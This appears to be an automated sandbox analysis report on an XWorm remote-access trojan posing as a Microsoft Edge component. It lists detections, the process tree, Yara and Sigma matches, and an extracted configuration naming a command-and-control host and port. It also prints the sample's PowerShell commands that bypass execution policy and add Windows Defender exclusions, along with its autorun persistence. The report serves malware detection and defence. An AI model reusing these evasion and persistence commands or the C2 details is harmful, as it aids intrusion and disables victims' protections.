Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
msedge_visual_render.exe

Overview

General Information

Sample name:msedge_visual_render.exe
Analysis ID:1556740
MD5:e796b778b392f06de4d340ec0f88b4cc
SHA1:32561bf3b022aef8a62bac3e820ef7e3bc648f57
SHA256:1ff08d4cbe1a41c10692941c7835b93ea5738057dc381cf4704136436911df05
Tags:exeXWormuser-aachum
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • msedge_visual_render.exe (PID: 1992 cmdline: "C:\Users\user\Desktop\msedge_visual_render.exe" MD5: E796B778B392F06DE4D340EC0F88B4CC)
    • powershell.exe (PID: 5948 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3944 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge_visual_render.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 984 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\msedge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5136 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • msedge.exe (PID: 2408 cmdline: "C:\Users\user\AppData\Roaming\msedge.exe" MD5: E796B778B392F06DE4D340EC0F88B4CC)
  • msedge.exe (PID: 616 cmdline: "C:\Users\user\AppData\Roaming\msedge.exe" MD5: E796B778B392F06DE4D340EC0F88B4CC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["23.ip.gl.ply.gg"], "Port": 57660, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
msedge_visual_render.exeJoeSecurity_XWormYara detected XWormJoe Security
    msedge_visual_render.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0xd94e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0xd9eb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0xdb00:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0xd55c:$cnc4: POST / HTTP/1.1

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\msedge.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Roaming\msedge.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xd94e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xd9eb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xdb00:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xd55c:$cnc4: POST / HTTP/1.1

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.3338785172.0000000012701000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000000.00000002.3338785172.0000000012701000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x640e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x64ab:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x65c0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x601c:$cnc4: POST / HTTP/1.1
        00000000.00000000.2055237317.00000000003F2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          00000000.00000000.2055237317.00000000003F2000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0xd74e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0xd7eb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0xd900:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0xd35c:$cnc4: POST / HTTP/1.1
          Process Memory Space: msedge_visual_render.exe PID: 1992JoeSecurity_XWormYara detected XWormJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.0.msedge_visual_render.exe.3f0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
              0.0.msedge_visual_render.exe.3f0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0xd94e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0xd9eb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0xdb00:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0xd55c:$cnc4: POST / HTTP/1.1

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\msedge_visual_render.exe", ParentImage: C:\Users\user\Desktop\msedge_visual_render.exe, ParentProcessId: 1992, ParentProcessName: msedge_visual_render.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe', ProcessId: 5948, ProcessName: powershell.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\msedge_visual_render.exe", ParentImage: C:\Users\user\Desktop\msedge_visual_render.exe, ParentProcessId: 1992, ParentProcessName: msedge_visual_render.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe', ProcessId: 5948, ProcessName: powershell.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\msedge.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\msedge_visual_render.exe, ProcessId: 1992, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msedge
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\msedge_visual_render.exe", ParentImage: C:\Users\user\Desktop\msedge_visual_render.exe, ParentProcessId: 1992, ParentProcessName: msedge_visual_render.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe', ProcessId: 5948, ProcessName: powershell.exe
              Sigma detected: Startup Folder File Write
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\msedge_visual_render.exe, ProcessId: 1992, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\msedge_visual_render.exe", ParentImage: C:\Users\user\Desktop\msedge_visual_render.exe, ParentProcessId: 1992, ParentProcessName: msedge_visual_render.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe', ProcessId: 5948, ProcessName: powershell.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-15T22:11:56.561263+010028559241Malware Command and Control Activity Detected192.168.2.549984147.185.221.2357660TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: msedge_visual_render.exeMalware Configuration Extractor: Xworm {"C2 url": ["23.ip.gl.ply.gg"], "Port": 57660, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Roaming\msedge.exeReversingLabs: Detection: 73%
              Multi AV Scanner detection for submitted file
              Source: msedge_visual_render.exeReversingLabs: Detection: 73%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Roaming\msedge.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: msedge_visual_render.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: msedge_visual_render.exeString decryptor: 23.ip.gl.ply.gg
              Source: msedge_visual_render.exeString decryptor: 57660
              Source: msedge_visual_render.exeString decryptor: <123456789>
              Source: msedge_visual_render.exeString decryptor: <Xwormmm>
              Source: msedge_visual_render.exeString decryptor: XWorm V5.6
              Source: msedge_visual_render.exeString decryptor: USB.exe
              Source: msedge_visual_render.exeString decryptor: %AppData%
              Source: msedge_visual_render.exeString decryptor: msedge.exe
              Source: msedge_visual_render.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: msedge_visual_render.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49984 -> 147.185.221.23:57660
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 23.ip.gl.ply.gg
              Source: global trafficTCP traffic: 192.168.2.5:49862 -> 147.185.221.23:57660
              Source: Joe Sandbox ViewIP Address: 147.185.221.23 147.185.221.23
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: 23.ip.gl.ply.gg
              Source: powershell.exe, 00000008.00000002.2362125678.0000020A2B89B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
              Source: powershell.exe, 00000008.00000002.2362125678.0000020A2B89B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
              Source: powershell.exe, 00000008.00000002.2360202768.0000020A2B710000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
              Source: powershell.exe, 00000002.00000002.2136913212.000001CFE44C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2213548272.00000184DA741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2344287876.0000020A23251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2509527008.000002C7F46F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 0000000A.00000002.2396438363.000002C7E48A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2122069386.000001CFD4679000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2168718628.00000184CA8F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2259166369.0000020A13408000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2396438363.000002C7E48A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: msedge_visual_render.exe, 00000000.00000002.3303162945.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2122069386.000001CFD4451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2168718628.00000184CA6D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2259166369.0000020A131E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2396438363.000002C7E4681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000002.00000002.2122069386.000001CFD4679000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2168718628.00000184CA8F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2259166369.0000020A13408000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2396438363.000002C7E48A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: powershell.exe, 0000000A.00000002.2396438363.000002C7E48A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000005.00000002.2224332852.00000184E2AF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
              Source: powershell.exe, 00000008.00000002.2356985034.0000020A2B57F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
              Source: powershell.exe, 00000002.00000002.2122069386.000001CFD4451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2168718628.00000184CA6D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2259166369.0000020A131E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2396438363.000002C7E4681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 0000000A.00000002.2509527008.000002C7F46F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000000A.00000002.2509527008.000002C7F46F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000000A.00000002.2509527008.000002C7F46F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 0000000A.00000002.2396438363.000002C7E48A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.2142783019.000001CFECB60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.m
              Source: powershell.exe, 00000002.00000002.2136913212.000001CFE44C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2213548272.00000184DA741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2344287876.0000020A23251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2509527008.000002C7F46F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 0000000A.00000002.2526355143.000002C7FC9E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.verisign.

              Operating System Destruction

              barindex
              Protects its processes via BreakOnTermination flag
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: 01 00 00 00 Jump to behavior

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: msedge_visual_render.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.0.msedge_visual_render.exe.3f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000002.3338785172.0000000012701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000000.2055237317.00000000003F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Users\user\AppData\Roaming\msedge.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Users\user\Desktop\msedge_visual_render.exeCode function: 0_2_00007FF848F416890_2_00007FF848F41689
              Source: C:\Users\user\Desktop\msedge_visual_render.exeCode function: 0_2_00007FF848F485320_2_00007FF848F48532
              Source: C:\Users\user\Desktop\msedge_visual_render.exeCode function: 0_2_00007FF848F477860_2_00007FF848F47786
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF8490030E95_2_00007FF8490030E9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF8490030E910_2_00007FF8490030E9
              Source: C:\Users\user\AppData\Roaming\msedge.exeCode function: 13_2_00007FF848F1168913_2_00007FF848F11689
              Source: C:\Users\user\AppData\Roaming\msedge.exeCode function: 13_2_00007FF848F10EFA13_2_00007FF848F10EFA
              Source: C:\Users\user\AppData\Roaming\msedge.exeCode function: 14_2_00007FF848F3168914_2_00007FF848F31689
              Source: C:\Users\user\AppData\Roaming\msedge.exeCode function: 14_2_00007FF848F30EFA14_2_00007FF848F30EFA
              Source: msedge_visual_render.exe, 00000000.00000002.3338785172.0000000012701000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge_webVirtual2.exe4 vs msedge_visual_render.exe
              Source: msedge_visual_render.exe, 00000000.00000000.2055265238.0000000000402000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemsedge_webVirtual2.exe4 vs msedge_visual_render.exe
              Source: msedge_visual_render.exeBinary or memory string: OriginalFilenamemsedge_webVirtual2.exe4 vs msedge_visual_render.exe
              Source: msedge_visual_render.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: msedge_visual_render.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.0.msedge_visual_render.exe.3f0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.3338785172.0000000012701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000000.2055237317.00000000003F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: C:\Users\user\AppData\Roaming\msedge.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: msedge_visual_render.exe, bg5pDCbiKesxiwN0NyC6BFvciFfpHEL1JU4v5uGDqleamvdbu7PjKyTcWLOZ8XQXgK9USGgsC.csCryptographic APIs: 'TransformFinalBlock'
              Source: msedge_visual_render.exe, 2c2OZMa7wIHjbQyGjzc9vbqhoSyzYYwSaHycpYduXsi9Kun78wGkFvt1I9Kue9An4GYq2jn0n.csCryptographic APIs: 'TransformFinalBlock'
              Source: msedge_visual_render.exe, 2c2OZMa7wIHjbQyGjzc9vbqhoSyzYYwSaHycpYduXsi9Kun78wGkFvt1I9Kue9An4GYq2jn0n.csCryptographic APIs: 'TransformFinalBlock'
              Source: msedge.exe.0.dr, bg5pDCbiKesxiwN0NyC6BFvciFfpHEL1JU4v5uGDqleamvdbu7PjKyTcWLOZ8XQXgK9USGgsC.csCryptographic APIs: 'TransformFinalBlock'
              Source: msedge.exe.0.dr, 2c2OZMa7wIHjbQyGjzc9vbqhoSyzYYwSaHycpYduXsi9Kun78wGkFvt1I9Kue9An4GYq2jn0n.csCryptographic APIs: 'TransformFinalBlock'
              Source: msedge.exe.0.dr, 2c2OZMa7wIHjbQyGjzc9vbqhoSyzYYwSaHycpYduXsi9Kun78wGkFvt1I9Kue9An4GYq2jn0n.csCryptographic APIs: 'TransformFinalBlock'
              Source: msedge_visual_render.exe, gUeJiTeUFSlCFEA4RMwxWrX8e0AP00tNPBK3Dwxp4LwfuASRUP0W1uO.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: msedge_visual_render.exe, gUeJiTeUFSlCFEA4RMwxWrX8e0AP00tNPBK3Dwxp4LwfuASRUP0W1uO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: msedge.exe.0.dr, gUeJiTeUFSlCFEA4RMwxWrX8e0AP00tNPBK3Dwxp4LwfuASRUP0W1uO.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: msedge.exe.0.dr, gUeJiTeUFSlCFEA4RMwxWrX8e0AP00tNPBK3Dwxp4LwfuASRUP0W1uO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.evad.winEXE@15/20@1/1
              Source: C:\Users\user\Desktop\msedge_visual_render.exeFile created: C:\Users\user\AppData\Roaming\msedge.exeJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeMutant created: \Sessions\1\BaseNamedObjects\ztbycrrY0E0emVPB
              Source: C:\Users\user\AppData\Roaming\msedge.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2940:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ambi105q.wbg.ps1Jump to behavior
              Source: msedge_visual_render.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: msedge_visual_render.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\msedge_visual_render.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: msedge_visual_render.exeReversingLabs: Detection: 73%
              Source: C:\Users\user\Desktop\msedge_visual_render.exeFile read: C:\Users\user\Desktop\msedge_visual_render.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\msedge_visual_render.exe "C:\Users\user\Desktop\msedge_visual_render.exe"
